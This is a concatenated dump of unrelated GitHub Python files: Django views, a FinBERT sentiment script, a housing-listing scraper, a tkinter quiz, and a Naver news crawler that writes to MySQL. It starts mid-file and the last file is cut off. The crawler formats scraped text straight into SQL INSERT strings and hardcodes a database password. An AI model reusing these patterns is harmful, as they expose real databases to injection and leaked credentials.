import HttpResponse, Http404\nfrom django.shortcuts import get_object_or_404\n\nfrom djpubsubhubbub.models import Subscription\nfrom djpubsubhubbub.signals import verified, updated\n\n@csrf_exempt\ndef callback(request, pk):\n if request.method == 'GET':\n mode = request.GET['hub.mode']\n topic = request.GET['hub.topic']\n challenge = request.GET['hub.challenge']\n lease_seconds = request.GET.get('hub.lease_seconds')\n verify_token = request.GET.get('hub.verify_token', '')\n\n if mode == 'subscribe':\n if not verify_token.startswith('subscribe'):\n raise Http404\n subscription = get_object_or_404(Subscription,\n pk=pk,\n topic=topic,\n verify_token=verify_token)\n subscription.verified = True\n subscription.set_expiration(int(lease_seconds))\n verified.send(sender=subscription)\n\n return HttpResponse(challenge, content_type='text/plain')\n elif request.method == 'POST':\n subscription = get_object_or_404(Subscription, pk=pk)\n parsed = feedparser.parse(request.raw_post_data)\n if parsed.feed.links: # single notification\n hub_url = subscription.hub\n self_url = subscription.topic\n for link in parsed.feed.links:\n if link['rel'] == 'hub':\n hub_url = link['href']\n elif link['rel'] == 'self':\n self_url = link['href']\n\n needs_update = False\n if hub_url and subscription.hub != hub_url:\n # hub URL has changed; let's update our subscription\n needs_update = True\n elif self_url != subscription.topic:\n # topic URL has changed\n needs_update = True\n\n if needs_update:\n expiration_time = subscription.lease_expires - datetime.now()\n seconds = expiration_time.days*86400 + expiration_time.seconds\n Subscription.objects.subscribe(\n self_url, hub_url,\n callback=request.build_absolute_uri(),\n lease_seconds=seconds)\n\n updated.send(sender=subscription, update=parsed)\n return HttpResponse('')\n return Http404\n","repo_name":"ojax/ojax","sub_path":"apps/djpubsubhubbub/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"17951597235","text":"import pandas as pd\nimport news\nimport torch\n\nnews_df = news.get_news()\nnews_df['date'] = pd.to_datetime(news_df['date'], format='%d/%m/%Y')\n\n# Use a pipeline as a high-level helper\nfrom transformers import pipeline\n\npipe = pipeline(\"text-classification\", model=\"ProsusAI/finbert\")\n\n# Load model directly\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\n\ntokenizer = AutoTokenizer.from_pretrained(\"ProsusAI/finbert\")\nmodel = AutoModelForSequenceClassification.from_pretrained(\"ProsusAI/finbert\")\n\n# Tokenize the headlines\ninputs = tokenizer(list(news_df['headline']), return_tensors=\"pt\", padding=True, truncation=True, max_length=512)\n\n# Get model predictions\nwith torch.no_grad():\n outputs = model(**inputs)\n logits = outputs.logits\n probabilities = torch.nn.functional.softmax(logits, dim=-1)\n predicted_indices = torch.argmax(logits, dim=-1)\n\ndef get_sentiment():\n global news_df\n # Extract sentiment labels and their corresponding probabilities\n sentiments = [model.config.id2label[idx.item()] for idx in predicted_indices]\n probabilities_list = [prob[predicted_indices[i].item()].item() for i, prob in enumerate(probabilities)]\n\n # Add the results to the dataframe\n news_df['sentiment'] = sentiments\n news_df['probability'] = probabilities_list\n # Sort by date\n news_df = news_df.sort_values('date')\n news_df.to_csv('news_df.csv', index=False)\n return news_df\n","repo_name":"sire-ambrose/Nigeria-Market-Sentiment-Analyzer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73237084571","text":"#!usr/bin/env python \n# -*- coding:utf-8 -*-\n\"\"\" \n@author:51211 \n@file: out2xlsForSale.py\n@time: 2017/07/04 \n\"\"\"\nimport requests\nimport xlsxwriter\nfrom bs4 import BeautifulSoup\nfrom source.sale_item import HouseItem\n\nrequests.adapters.DEFAULT_RETRIES = 5 # 增加重连次数\ns = requests.session()\ns.keep_alive = False # 关闭多余连接\n\n\n# s.proxies = {\"https\": \"185.22.174.69:1448\", \"http\": \"180.118.128.38:9000\", }\n\n\n# 根据县区名字找到下面街道或者镇的url链接\ndef find_sub_link_by_region_name(param_url):\n global headers\n response = s.get(url=param_url, headers=headers)\n soup = BeautifulSoup(response.text, 'html.parser')\n region_items = soup.select('html body #container #content > div.div-border.items-list > div:nth-of-type(1)')\n children = region_items[0].contents\n region_items_details = children[1]\n selected_region = region_items_details.find(\"span\", class_=\"selected-item\")\n param_region_name = selected_region.string\n sub_items = region_items_details.find(\"div\", class_=\"sub-items\")\n sub_items_list = sub_items.find_all(\"a\")\n # print(sub_items_list)\n param_sub_items_dict = {}\n for item in sub_items_list:\n # print(item.string)\n # print(item['href'])\n param_sub_items_dict[item.string] = item['href']\n return param_region_name, param_sub_items_dict\n\n\n# 从当前页上把房产信息添加到house_items列表上\ndef add2house_items_from_one_page():\n global item_index\n global is_has_next\n soup = BeautifulSoup(sub_response.text, 'html.parser')\n house_list = soup.select('html body #container div #houselist-mod-new li')\n is_has_next = len(soup.find_all(\"a\", class_=\"aNxt\"))\n try:\n for item in house_list:\n item_index = item_index + 1\n print(\"**********************\" + str(item_index) + \"**************************\")\n children = item.contents\n div_item_img = children[1]\n img_src = div_item_img.contents[1]['src']\n\n div_house_details = children[3]\n div_house_title = div_house_details.contents[1]\n\n house_list_title = div_house_title.contents[1]['title']\n div_details_item = div_house_details.contents[3]\n\n structure = div_details_item.contents[1].string\n area = div_details_item.contents[3].string\n floor = div_details_item.contents[5].string\n time = div_details_item.contents[7].string\n\n div_details_item2 = div_house_details.contents[5]\n address = div_details_item2.contents[1]['title']\n\n div_pro_price = children[5]\n price_det = div_pro_price.contents[1].contents[0].string + '万'\n unit_price = div_pro_price.contents[2].string\n\n # 构造item实例\n house_item = HouseItem(img_src, house_list_title, structure, area, floor, time, address, price_det,\n unit_price)\n house_item.my_print()\n house_items.append(house_item)\n except Exception as ex:\n print(\"except catch = %s\" % str(ex))\n print(house_list)\n\n\n# 根据城镇名在xls添加sheet\ndef add_sheet_by_town_name(param_key):\n ws = wb.add_worksheet(param_key)\n ws.set_column('A:A', 60)\n ws.set_column('D:D', 15)\n ws.set_column('E:E', 13)\n ws.set_column('F:F', 44)\n ws.set_column('H:H', 11)\n i = 0\n while i < len(house_items) + 1:\n if i == 0:\n ws.write(i, 0, '房产标题', )\n ws.write(i, 1, '几室几厅', )\n ws.write(i, 2, '面积', )\n ws.write(i, 3, '楼层', )\n ws.write(i, 4, '建成时间', )\n ws.write(i, 5, '地理位置', )\n ws.write(i, 6, '总价', )\n ws.write(i, 7, '均价', )\n else:\n ws.write(i, 0, house_items[i - 1].house_list_title, )\n ws.write(i, 1, house_items[i - 1].structure, )\n ws.write(i, 2, house_items[i - 1].area, )\n ws.write(i, 3, house_items[i - 1].floor, )\n ws.write(i, 4, house_items[i - 1].time, )\n ws.write(i, 5, house_items[i - 1].address, )\n ws.write(i, 6, house_items[i - 1].price_det, )\n ws.write(i, 7, house_items[i - 1].unit_price, )\n i = i + 1\n\n\n# 根据县区名创建xls\ndef add_workbook_by_region_name(param_region_name):\n global wb, house_items, item_index, is_has_next, sub_response\n import os\n if not os.path.exists('../house_sale_xls'):\n os.makedirs('../house_sale_xls')\n wb = xlsxwriter.Workbook('../house_sale_xls/' + param_region_name + '.xlsx')\n for key in sub_items_dict.keys():\n print(key)\n sub_url = sub_items_dict[key] + 'p%s'\n print(sub_url)\n page_index = 1\n house_items = []\n item_index = 0\n is_has_next = 0\n while True:\n sub_response = s.get(url=sub_url % str(page_index), headers=headers)\n print('page_index=' + str(page_index))\n add2house_items_from_one_page()\n page_index = page_index + 1\n if is_has_next == 0:\n break\n\n print(len(house_items))\n\n add_sheet_by_town_name(key)\n wb.close()\n\n\nif __name__ == '__main__':\n # sale_list index from 0 ~ 9\n sale_list = ['gongyeyuanqu',\n 'gaoxinqusuzhou',\n 'wuzhong',\n 'xiangcheng',\n 'wujiang',\n 'gushuqu',\n 'changshua',\n 'zhangjiagang',\n 'huqius',\n 'taicang']\n\n url = 'https://suzhou.anjuke.com/sale/%s/' % sale_list[6]\n\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/' \\\n '59.0.3071.115 Safari/537.36'\n headers = {\n 'User-Agent': user_agent,\n }\n region_name, sub_items_dict = find_sub_link_by_region_name(url)\n print(region_name)\n print(sub_items_dict.keys())\n\n add_workbook_by_region_name(region_name)\n","repo_name":"HasakiWMC/house_sale","sub_path":"source/out2xlsForSale.py","file_name":"out2xlsForSale.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3631939072","text":"import math\nimport random\n\n\nclass AnnealingModule(object):\n def __init__(self, default_point_and_time):\n self.__points_and_time = list()\n self.__all_points_and_time = list()\n self.__best_point_and_time = default_point_and_time\n self.__thermometer = Thermometer(10)\n\n def get_best_point_and_time(self):\n return self.__best_point_and_time\n\n def get_top_of_points(self, number):\n result = list()\n for index, point_and_time in enumerate(self.__all_points_and_time):\n if index < number:\n result.append(point_and_time)\n else:\n break\n return result\n\n def add_point(self, point, solving_time):\n self.__save_point(point, solving_time)\n print(\"AnnealingModule.add_point: time = \" + str(solving_time) + \" , \" + str(point))\n if self.__best_point_and_time is not None:\n if solving_time <= self.__best_point_and_time[1]:\n self.__best_point_and_time = (point, solving_time)\n else:\n self.__best_point_and_time = (point, solving_time)\n for index, point_and_time in enumerate(self.__points_and_time):\n if solving_time <= point_and_time[1]:\n print(\"index = \" + str(index))\n self.__points_and_time.insert(index, (point, solving_time))\n return\n print(\"index = Last\")\n self.__points_and_time.append((point, solving_time))\n\n def get_next_point_and_time(self, previous_point_time):\n result = None\n index_to_remove = -1\n print(\"SEARCH. previous point time = \" + str(previous_point_time))\n for index, point_and_time in enumerate(self.__points_and_time):\n tested_time = point_and_time[1]\n print(\"tested time = \" + str(tested_time))\n if previous_point_time > tested_time:\n result = point_and_time\n index_to_remove = index\n break\n else:\n if self.__thermometer.get_val() <= 0:\n return None\n probability = math.exp(-1*(tested_time-previous_point_time)/self.__thermometer.get_val())\n if random.random() <= probability:\n result = point_and_time\n index_to_remove = index\n print(\"Prob: \" + str(probability) + \" --- \" + \"(+)\")\n break\n else:\n print(\"Prob: \" + str(probability) + \" --- \" + \"(-)\")\n self.__thermometer.cool()\n if result is not None:\n self.__points_and_time.pop(index_to_remove)\n return result\n\n# ----------------------------------------------------------------------------------------------------------------------\n def __save_point(self, point, solving_time):\n for index, point_and_time in enumerate(self.__all_points_and_time):\n if solving_time <= point_and_time[1]:\n self.__all_points_and_time.insert(index, (point, solving_time))\n return\n self.__all_points_and_time.append((point, solving_time))\n\n\n########################################################################################################################\nclass Thermometer(object):\n def __init__(self, start_temperature):\n self.__temperature = start_temperature\n\n def get_val(self):\n return self.__temperature\n\n def cool(self):\n self.__temperature -= 1\n","repo_name":"Dalidul/ParamsGen","sub_path":"ValHunter/AnnealingModule.py","file_name":"AnnealingModule.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36878633788","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.views.generic import TemplateView\nfrom .models import FiniSection, FiniCode\nfrom collections import OrderedDict\nfrom .forms import FiniSectionForm, FiniCodeForm\nfrom django.views.generic.edit import FormView, UpdateView\nfrom django.template.loader import render_to_string\nfrom django.http import JsonResponse\nfrom braces.views import CsrfExemptMixin, JsonRequestResponseMixin\nimport re\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.contrib.auth.context_processors import PermWrapper\n\n\n# Section List View\nclass SectionListView(TemplateView):\n template_name = \"indicators/indicator_content.html\"\n permission_required = ('indicators.view_indicators')\n\n def get_context_data(self, **kwargs):\n context = super(SectionListView, self).get_context_data(**kwargs)\n sections = FiniSection.objects.all().prefetch_related('finicode_set').order_by('orderby')\n dictionary = OrderedDict()\n for section in sections:\n dictionary[section] = section.finicode_set.all()\n context['dictionary'] = dictionary\n context['indicators_without_section'] = FiniCode.objects.filter(section__isnull=True).order_by('fini_code_so')\n return context\n\n\n# Section Edit View\nclass SectionEditView(PermissionRequiredMixin, UpdateView):\n template_name = 'indicators/edit_section.html'\n form_class = FiniSectionForm\n model = FiniSection\n permission_required = ('indicators.edit_section_of_indicators')\n raise_exception = True\n\n def get(self, request, *args, **kwargs):\n data = dict()\n section = FiniSection.objects.get(pk=self.kwargs['pk'])\n section_edit_form = FiniSectionForm(instance=section)\n context = {'section': section, 'section_edit_form': section_edit_form}\n data['html_form'] = render_to_string('indicators/edit_section.html', context, request=request)\n return JsonResponse(data)\n\n def form_valid(self, form):\n form.save()\n section = FiniSection.objects.get(pk=self.kwargs['pk']) \n data = dict()\n data['section_id'] = section.id\n data['html_section_header'] = render_to_string(\n 'indicators/section_header.html',\n {\n 'section': section,\n 'perms': PermWrapper(self.request.user),\n }\n )\n data['form_is_valid'] = True\n return JsonResponse(data)\n\n def form_invalid(self, form):\n data = dict()\n data['form_is_valid'] = False\n data['form_errors'] = form.errors\n return JsonResponse(data)\n\n\n# Indicator Edit View\nclass IndicatorEditView(PermissionRequiredMixin, UpdateView):\n template_name = 'indicators/edit_indicator.html'\n form_class = FiniCodeForm\n model = FiniCode\n permission_required = ('indicators.edit_indicator')\n raise_exception = True\n\n def get(self, request, *args, **kwargs):\n data = dict()\n indicator = FiniCode.objects.get(pk=self.kwargs['pk'])\n indicator_edit_form = FiniCodeForm(instance=indicator)\n context = {'indicator': indicator, 'indicator_edit_form': indicator_edit_form}\n data['html_form'] = render_to_string('indicators/edit_indicator.html', context, request=request)\n return JsonResponse(data)\n\n def form_valid(self, form):\n form.save()\n indicator = FiniCode.objects.get(pk=self.kwargs['pk'])\n data = dict()\n data['indicator_id'] = indicator.id\n data['html_indicator'] = render_to_string(\n 'indicators/indicator.html',\n {\n 'indicator': indicator,\n 'perms': PermWrapper(self.request.user),\n }\n )\n data['form_is_valid'] = True\n return JsonResponse(data)\n\n def form_invalid(self, form):\n data = dict()\n data['form_is_valid'] = False\n data['form_errors'] = form.errors\n print(form.errors)\n return JsonResponse(data)\n\n\n# Section Sorting View\nclass SectionSortingView(CsrfExemptMixin, JsonRequestResponseMixin, FormView):\n def post(self, request, *args, **kwargs):\n for pk, orderby in self.request_json.items():\n FiniSection.objects.filter(pk=pk).update(orderby=orderby)\n return self.render_json_response({'saved': 'ok'})\n\n\n# Indicator Sorting View\nclass IndicatorSortingView(CsrfExemptMixin, JsonRequestResponseMixin, FormView):\n def post(self, request, *args, **kwargs):\n for key, value in self.request_json.items():\n section_id = int(re.findall(r'^\\D*(\\d+)', key)[0])\n idx = 1\n for item in value:\n if section_id==0:\n FiniCode.objects.filter(pk=int(re.findall(r'^\\D*(\\d+)', item)[0])).update(section=None, fini_code_so=idx)\n else:\n FiniCode.objects.filter(pk=int(re.findall(r'^\\D*(\\d+)', item)[0])).update(section=section_id, fini_code_so=idx)\n idx += 1\n return self.render_json_response({'saved': 'ok'})\n\n","repo_name":"nurzhannogerbek/dashboard.kase.kz","sub_path":"indicators/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14645277980","text":"import tkinter as tk\nfrom pathlib import Path\nfrom quiz_brain import QuizBrain\nfrom question_model import Question\n\nTHEME_COLOR = \"#375362\"\nQUESTION_FONT = (\"Arial\", 20, \"italic\")\nSCORE_FONT = (\"Arial\", 14, \"bold\")\nCANVAS_WIDTH = 300\nCANVAS_HEIGHT = 250\nPADDING = 20\nBLINK_LENGTH_MS = 500\n\ncwd = Path(__file__).parent\n\n\nclass QuizInterface():\n\n def __init__(self, quiz: QuizBrain) -> None:\n self.quiz = quiz\n self.window = tk.Tk()\n self.window.title(\"Quizzlet\")\n self.window.config(bg=THEME_COLOR)\n # Initialize the visual elements\n self._init_canvas()\n self._init_score()\n self._init_buttons()\n self.next_question()\n self.window.mainloop()\n\n def _init_canvas(self):\n self.canvas = tk.Canvas(width=CANVAS_WIDTH, height=CANVAS_HEIGHT)\n self.canvas.grid(\n row=1,\n column=0,\n columnspan=2,\n padx=PADDING,\n pady=PADDING,\n )\n self.question_text = self.canvas.create_text(\n CANVAS_WIDTH/2,\n CANVAS_HEIGHT/2,\n text=\"Example text.\",\n font=QUESTION_FONT,\n width=CANVAS_WIDTH-PADDING,\n )\n\n def _init_score(self):\n self.score = tk.Label(text=\"Score: 0\", fg=\"white\", bg=THEME_COLOR)\n self.score.config(font=SCORE_FONT)\n self.score.grid(row=0, column=1, padx=PADDING, pady=PADDING)\n\n def _init_buttons(self):\n button_true_image_path = cwd/\"images/true.png\"\n # NOTE: the image must be stored in memory, so its scope has to be the\n # same as the object\n self.button_true_image = tk.PhotoImage(file=button_true_image_path)\n self.button_true = tk.Button(image=self.button_true_image)\n self.button_true.config(highlightthickness=0)\n self.button_true.config(command=lambda: self.check_answer(\"True\"))\n self.button_true.grid(row=2, column=0, padx=PADDING, pady=PADDING)\n\n button_false_image_path = cwd/\"images/false.png\"\n # NOTE: the image must be stored in memory, so its scope has to be the\n # same as the object\n self.button_false_image = tk.PhotoImage(file=button_false_image_path)\n self.button_false = tk.Button(image=self.button_false_image)\n self.button_false.config(highlightthickness=0)\n self.button_false.config(command=lambda: self.check_answer(\"False\"))\n self.button_false.grid(row=2, column=1, padx=PADDING, pady=PADDING)\n\n def next_question(self):\n question_text = self.quiz.next_question()\n self.update_text(question_text)\n\n def update_score(self, score: int):\n self.score.config(text=f\"Score: {score}\")\n\n def update_text(self, text: str):\n self.canvas.itemconfig(self.question_text, text=text)\n\n def check_answer(self, answer: str):\n is_answer_correct = self.quiz.check_answer(answer)\n if is_answer_correct:\n self.blink_color_canvas(\"green\")\n self.update_score(self.quiz.score)\n else:\n self.blink_color_canvas(\"red\")\n if self.quiz.still_has_questions():\n self.window.after(BLINK_LENGTH_MS, self.next_question)\n else:\n end_text = \"Congratulations!\\nYou've completed the quiz!\"\n self.window.after(\n BLINK_LENGTH_MS,\n lambda: self.update_text(end_text)\n )\n\n def blink_color_canvas(self, color: str):\n self.canvas.config(bg=color)\n self.window.after(\n BLINK_LENGTH_MS,\n lambda: self.canvas.config(bg=\"white\")\n )\n\n\nif __name__ == \"__main__\":\n quiz = QuizBrain([Question(\"Empty text\", \"True\")])\n app = QuizInterface(quiz)\n","repo_name":"Cryo98/CRS006_UdemyPythonBootcamp2023","sub_path":"Intermediate+/Day_034_Quizzlet/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3048857452","text":"from xml.dom.minidom import Element\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nimport pymysql\n\n\n\ndriver = webdriver.Chrome('/Applications/chromedriver')\nurl = 'https://finance.naver.com/news/'\ndriver.get(url)\n\n\n\n#test1=driver.find_element(by=By.XPATH, value='//*[@id=\"newarea\"]/div[1]/ul/li[1]').click()\ntest1=driver.find_element(by=By.XPATH, value='//*[@id=\"newarea\"]/div[1]/ul/li[1]/a/strong').click()\n\nconn = pymysql.connect(host='localhost', user='root', password='qwer1234!A', charset='utf8', db='crawl_data') \ncur = conn.cursor()\ncur.execute(\"create table news (news_code int(15) NOT NULL AUTO_INCREMENT primary key, title varchar(50),content varchar(1000),date varchar(20),press varchar(20));\")\n\nfor j in range(2,10):\n\n for i in range(1, 11):\n test1=driver.find_element(by=By.XPATH, value=f'//*[@id=\"contentarea_left\"]/ul/li[1]/dl/dt[{i}]/a').click()\n print(test1)\n driver.implicitly_wait(2)\n test2=driver.find_element(by=By.XPATH, value='//*[@id=\"contentarea_left\"]/div[2]/div[1]/div[2]/h3').text #title\n test3=driver.find_element(by=By.XPATH, value='//*[@id=\"content\"]').text #content\n test4=driver.find_element(by=By.XPATH, value='//*[@id=\"contentarea_left\"]/div[2]/div[1]/div[2]/div/span').text #date\n test5=driver.find_element(by=By.CLASS_NAME, value=\"press\")\n test6=test5.find_element_by_tag_name(\"img\")\n test7=test6.get_attribute(\"alt\") #press\n\n sql = \"INSERT INTO news (title, content, date, press) VALUES ('%s', '%s', '%s', '%s')\" % (test2, test3, test4, test7)\n \n cur.execute(sql)\n \n \n driver.back() #뒤로가기\n driver.implicitly_wait(2)\n for i in range(1, 11):\n test1=driver.find_element(by=By.XPATH, value=f'//*[@id=\"contentarea_left\"]/ul/li[2]/dl/dt[{i}]/a').click()\n print(test1)\n driver.implicitly_wait(2)\n test8=driver.find_element(by=By.XPATH, value='//*[@id=\"contentarea_left\"]/div[2]/div[1]/div[2]/h3').text #title\n test9=driver.find_element(by=By.XPATH, value='//*[@id=\"content\"]').text #content\n test10=driver.find_element(by=By.XPATH, value='//*[@id=\"contentarea_left\"]/div[2]/div[1]/div[2]/div/span').text #date\n test11=driver.find_element(by=By.CLASS_NAME, value=\"press\")\n test12=test5.find_element_by_tag_name(\"img\")\n test13=test6.get_attribute(\"alt\") #press\n \n\n sql = \"INSERT INTO news (title, content, date, press) VALUES ('%s', '%s', '%s', '%s')\" % (test8, test9, test10, test13)\n \n cur.execute(sql)\n conn.commit()\n \n driver.back() #뒤로가기\n driver.implicitly_wait(2)\n url=f\"https://finance.naver.com/news/news_list.naver?mode=LSS2D§ion_id=101§ion_id2=258&page={j}\"\n driver.get(url)\n \n\n","repo_name":"jihyun11/Python","sub_path":"newsCrawling.py","file_name":"newsCrawling.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73546031130","text":"import tkinter.ttk as ttk\nimport time\nimport tkinter.messagebox as msgbox\n\nfrom tkinter import *\n\nroot = Tk()\nroot.title(\"route GUI\")\nroot.geometry(\"640x480\")\n\nLabel(root, text=\"choice Menu\").pack(side=\"top\")\n\nButton(root, text=\"Order\").pack(side=\"bottom\")\n\nframe_burger = Frame(root, relief = \"solid\", bd =1)\nframe_burger.pack(side=\"left\", fill=\"both\", expand=True)\n\nButton(frame_burger, text = \"burger\").pack()\nButton(frame_burger, text = \"cheese burger\").pack()\nButton(frame_burger, text = \"chicken burger\").pack()\n\nframe_drink = LabelFrame(root, text = \"Drink\")\nframe_drink.pack(side=\"right\",fill=\"both\",expand =True)\n\nButton(frame_drink, text=\"cola\").pack()\nButton(frame_drink, text=\"cider\").pack()\n\nroot.mainloop()\n","repo_name":"epter/python","sub_path":"GUI_frame.py","file_name":"GUI_frame.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71981809371","text":"import sys\n\n# extend PATH\nsys.path.extend([\n 'src/taming-transformers',\n '/home/kieran/iarts/stable_diff/deforum/venv_deforum/src/taming-transformers',\n '/home/kieran/iarts/stable_diff/deforum/venv_deforum/src/clip',\n 'src/clip',\n 'stable-diffusion/',\n 'k-diffusion',\n 'pytorch3d-lite',\n 'AdaBins',\n 'MiDaS',\n 'utils'\n])\n\nfrom utils import *\nimport py3d_tools as p3d\nfrom helpers import DepthModel, sampler_fn\nfrom k_diffusion.external import CompVisDenoiser\nfrom ldm.util import instantiate_from_config\nfrom ldm.models.diffusion.ddim import DDIMSampler\nfrom ldm.models.diffusion.plms import PLMSSampler\n\nimport argparse\nimport subprocess\nimport os\nimport json\nfrom IPython import display\n\nimport gc, math, os, pathlib, subprocess, sys, time\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport random\nimport re\nimport requests\nfrom datetime import datetime\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms as T\nimport torchvision.transforms.functional as TF\nfrom contextlib import contextmanager, nullcontext\nfrom einops import rearrange, repeat\nfrom omegaconf import OmegaConf\nfrom PIL import Image\nfrom pytorch_lightning import seed_everything\nfrom skimage.exposure import match_histograms\nfrom torchvision.utils import make_grid\nfrom tqdm import tqdm, trange\nfrom types import SimpleNamespace\nfrom torch import autocast\n\n# CLI args\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-d\", \"--device\", help=\"select cuda device\")\nparser.add_argument(\"-m\", \"--max_frames\", help=\"total frames in animation\")\nparser.add_argument(\"-p\", \"--prompt\", help=\"prompt for stable diff generation\")\ncli_args = parser.parse_args()\nmax_frames = int(cli_args.max_frames)\nprompt = cli_args.prompt\n\n# Get all available GPUs\nsub_p_res = subprocess.run(['nvidia-smi', '--query-gpu=name,memory.total,memory.free', '--format=csv,noheader'], stdout=subprocess.PIPE).stdout.decode('utf-8')\nprint(sub_p_res)\n\n# Set rank for single GPU\nos.environ['CUDA_VISIBLE_DEVICES'] = cli_args.device\n\n# create dir for models and outputs if they don't exist\nmodels_path = \"./content/models\" #@param {type:\"string\"}\noutput_path = \"./content/output\" #@param {type:\"string\"}\n\nos.makedirs(models_path, exist_ok=True)\nos.makedirs(output_path, exist_ok=True)\n\nprint(f\"models_path: {models_path}\")\nprint(f\"output_path: {output_path}\")\n\n# Stable Diffusion model config\nmodel_config = \"v1-inference.yaml\" #@param [\"custom\",\"v1-inference.yaml\"]\nmodel_checkpoint = \"sd-v1-4.ckpt\" #@param [\"custom\",\"sd-v1-4-full-ema.ckpt\",\"sd-v1-4.ckpt\",\"sd-v1-3-full-ema.ckpt\",\"sd-v1-3.ckpt\",\"sd-v1-2-full-ema.ckpt\",\"sd-v1-2.ckpt\",\"sd-v1-1-full-ema.ckpt\",\"sd-v1-1.ckpt\"]\ncustom_config_path = \"\" #@param {type:\"string\"}\ncustom_checkpoint_path = \"\" #@param {type:\"string\"}\n\nload_on_run_all = True #@param {type: 'boolean'}\nhalf_precision = True # check\ncheck_sha256 = True #@param {type:\"boolean\"}\n\nmodel_map = {\n \"sd-v1-4-full-ema.ckpt\": {'sha256': '14749efc0ae8ef0329391ad4436feb781b402f4fece4883c7ad8d10556d8a36a'},\n \"sd-v1-4.ckpt\": {'sha256': 'fe4efff1e174c627256e44ec2991ba279b3816e364b49f9be2abc0b3ff3f8556'},\n \"sd-v1-3-full-ema.ckpt\": {'sha256': '54632c6e8a36eecae65e36cb0595fab314e1a1545a65209f24fde221a8d4b2ca'},\n \"sd-v1-3.ckpt\": {'sha256': '2cff93af4dcc07c3e03110205988ff98481e86539c51a8098d4f2236e41f7f2f'},\n \"sd-v1-2-full-ema.ckpt\": {'sha256': 'bc5086a904d7b9d13d2a7bccf38f089824755be7261c7399d92e555e1e9ac69a'},\n \"sd-v1-2.ckpt\": {'sha256': '3b87d30facd5bafca1cbed71cfb86648aad75d1c264663c0cc78c7aea8daec0d'},\n \"sd-v1-1-full-ema.ckpt\": {'sha256': 'efdeb5dc418a025d9a8cc0a8617e106c69044bc2925abecc8a254b2910d69829'},\n \"sd-v1-1.ckpt\": {'sha256': '86cd1d3ccb044d7ba8db743d717c9bac603c4043508ad2571383f954390f3cea'}\n}\n\n# config path\nckpt_config_path = custom_config_path if model_config == \"custom\" else os.path.join(models_path, model_config)\nif os.path.exists(ckpt_config_path):\n print(f\"{ckpt_config_path} exists\")\nelse:\n ckpt_config_path = \"./stable-diffusion/configs/stable-diffusion/v1-inference.yaml\"\nprint(f\"Using config: {ckpt_config_path}\")\n\n# checkpoint path or download\nckpt_path = custom_checkpoint_path if model_checkpoint == \"custom\" else os.path.join(models_path, model_checkpoint)\nckpt_valid = True\nif os.path.exists(ckpt_path):\n print(f\"{ckpt_path} exists\")\nelse:\n print(f\"Please download model checkpoint and place in {os.path.join(models_path, model_checkpoint)}\")\n ckpt_valid = False\n\nif check_sha256 and model_checkpoint != \"custom\" and ckpt_valid:\n import hashlib\n print(\"\\n...checking sha256\")\n with open(ckpt_path, \"rb\") as f:\n bytes = f.read() \n hash = hashlib.sha256(bytes).hexdigest()\n del bytes\n if model_map[model_checkpoint][\"sha256\"] == hash:\n print(\"hash is correct\\n\")\n else:\n print(\"hash in not correct\\n\")\n ckpt_valid = False\n\nif ckpt_valid:\n print(f\"Using ckpt: {ckpt_path}\")\n\nif load_on_run_all and ckpt_valid:\n local_config = OmegaConf.load(f\"{ckpt_config_path}\")\n model = load_model_from_config(local_config, f\"{ckpt_path}\", half_precision=half_precision)\n device = torch.device(\"cuda\")\n #device = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n model = model.to(device)\n\n# PROMPT GENERATION\nwith open('base_prompts.txt', 'r') as file:\n base_prompts = file.read()\n\ngeneration_prompt = f\"{{rococo {prompt} headdress | {prompt} cornucopia | macro {prompt} | {prompt} Cthulhu | {prompt} nuclear explosion | {prompt} mushroom cloud | Hubble {prompt} nebula | {prompt} infestation | steampunk {prompt} | magic rubber {prompt} | psychedelic {prompt} | {prompt} couture}}\"\nbase_prompts = base_prompts.replace(\"{x}\", generation_prompt)\n\n# CHECK DIFF WITH motion[\"keyframe_frames\"] from generate_motion()\nkey_frames = list(np.arange(max_frames)[::100])\nkey_frames = [x + np.random.randint(-20, 20) for x in key_frames]\nkey_frames[0] = 0\n\nanimation_prompts = {}\nfor kf in key_frames:\n new_prompt = pick_variant(base_prompts)\n new_prompt = \" \".join(new_prompt.split())\n \n animation_prompts[int(kf)] = new_prompt\n\n# Run \nif __name__ == '__main__':\n\n args = SimpleNamespace(**DeforumArgs(output_path, prompt))\n anim_args = SimpleNamespace(**DeforumAnimArgs(max_frames))\n\n args.timestring = time.strftime('%Y%m%d%H%M%S')\n args.strength = max(0.0, min(1.0, args.strength))\n\n if args.seed == -1:\n args.seed = random.randint(0, 2**32 - 1)\n if not args.use_init:\n args.init_image = None\n if args.sampler == 'plms' and (args.use_init or anim_args.animation_mode != 'None'):\n print(f\"Init images aren't supported with PLMS yet, switching to KLMS\")\n args.sampler = 'klms'\n if args.sampler != 